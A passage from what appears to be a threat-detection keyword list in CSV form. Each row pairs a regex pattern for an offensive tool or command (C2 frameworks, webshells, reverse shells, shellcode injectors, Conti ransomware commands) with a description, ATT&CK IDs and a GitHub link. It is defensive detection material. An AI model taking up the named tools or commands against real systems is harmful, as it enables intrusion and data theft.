T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpWMI.Program*",".{0,1000}SharpWMI\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpWmiManager*",".{0,1000}SharpWmiManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpwmi-N*.exe*",".{0,1000}sharpwmi\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*sharpwsus locate*",".{0,1000}sharpwsus\slocate.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*SharpWSUS*",".{0,1000}SharpWSUS.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*SharpWSUS.*",".{0,1000}SharpWSUS\..{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nettitude/SharpWSUS","1","1","N/A","N/A","5","428","72","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z" "*SharPyShell Helper Commands:*",".{0,1000}SharPyShell\sHelper\sCommands\:.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShell*",".{0,1000}SharPyShell.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell is a tiny and obfuscated ASP.NET webshell that executes commands received by an encrypted channel compiling them in memory at runtime.","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*sharpyshell.aspx*",".{0,1000}sharpyshell\.aspx.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShell.py*",".{0,1000}SharPyShell\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShell_Test.ps1*",".{0,1000}SharPyShell_Test\.ps1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharPyShellPrompt.py*",".{0,1000}SharPyShellPrompt\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*SharpZeroLogon*",".{0,1000}SharpZeroLogon.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SharpZeroLogon.exe*",".{0,1000}SharpZeroLogon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpZippo.exe*",".{0,1000}SharpZippo\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" "*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ShawnDEvans/smbmap*",".{0,1000}ShawnDEvans\/smbmap.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*shell 'cmd.exe /c*",".{0,1000}shell\s\'cmd\.exe\s\/c.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shell net group *Domain Computers* /domain*",".{0,1000}shell\snet\sgroup\s.{0,1000}Domain\sComputers.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell net localgroup administrators*",".{0,1000}shell\snet\slocalgroup\sadministrators.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell nltest /dclist*",".{0,1000}shell\snltest\s\/dclist.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell rclone.exe copy *",".{0,1000}shell\srclone\.exe\scopy\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell should now be running as nt authority\\system!*",".{0,1000}shell\sshould\snow\sbe\srunning\sas\snt\sauthority\\\\system!.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","0","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*shell whoami /user*",".{0,1000}shell\swhoami\s\/user.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","36","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*shell whoami*",".{0,1000}shell\swhoami.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shell.exe -s payload.txt*",".{0,1000}shell\.exe\s\-s\spayload\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" "*shell_shocked*.js*",".{0,1000}shell_shocked.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*shell_shocked*.rb*",".{0,1000}shell_shocked.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*shell_smbadmin -Targets *",".{0,1000}shell_smbadmin\s\-Targets\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*shell_startup_files_modification.py*",".{0,1000}shell_startup_files_modification\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*shell_tknadmin -Domain * -DomainController *",".{0,1000}shell_tknadmin\s\-Domain\s.{0,1000}\s\-DomainController\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*shell_wmiadmin -Domain * -DomainController*",".{0,1000}shell_wmiadmin\s\-Domain\s.{0,1000}\s\-DomainController.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Shell3er.ps1*",".{0,1000}Shell3er\.ps1.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*shellc *.bin *",".{0,1000}shellc\s.{0,1000}\.bin\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*shellc *.shellc *",".{0,1000}shellc\s.{0,1000}\.shellc\s.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*ShellCmd cmd.exe *",".{0,1000}ShellCmd\scmd\.exe\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*ShellCmd copy *",".{0,1000}ShellCmd\scopy\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*ShellCmd net *",".{0,1000}ShellCmd\snet\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*ShellCmd sc qc *",".{0,1000}ShellCmd\ssc\sqc\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Shellcode & key Decrypted after stomping*",".{0,1000}Shellcode\s\&\skey\sDecrypted\safter\sstomping.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*SHELLCODE GENERATOR*",".{0,1000}SHELLCODE\sGENERATOR.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*shellcode inject *",".{0,1000}shellcode\sinject\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Shellcode Injected Successfully*",".{0,1000}Shellcode\sInjected\sSuccessfully.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*Shellcode injection complete!*",".{0,1000}Shellcode\sinjection\scomplete!.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Shellcode path changed:*shellcode_path*",".{0,1000}Shellcode\spath\schanged\:.{0,1000}shellcode_path.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","print output","10","10","1811","174","2024-02-24T15:33:54Z","2023-12-03T04:52:38Z" "*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Shellcode Process Hollowing.csproj*",".{0,1000}Shellcode\sProcess\sHollowing\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*Shellcode Process Injector.ps1*",".{0,1000}Shellcode\sProcess\sInjector\.ps1.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*shellcode spawn *",".{0,1000}shellcode\sspawn\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*shellcode*shellcode.bin*",".{0,1000}shellcode.{0,1000}shellcode\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*shellcode.asm*",".{0,1000}shellcode\.asm.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" 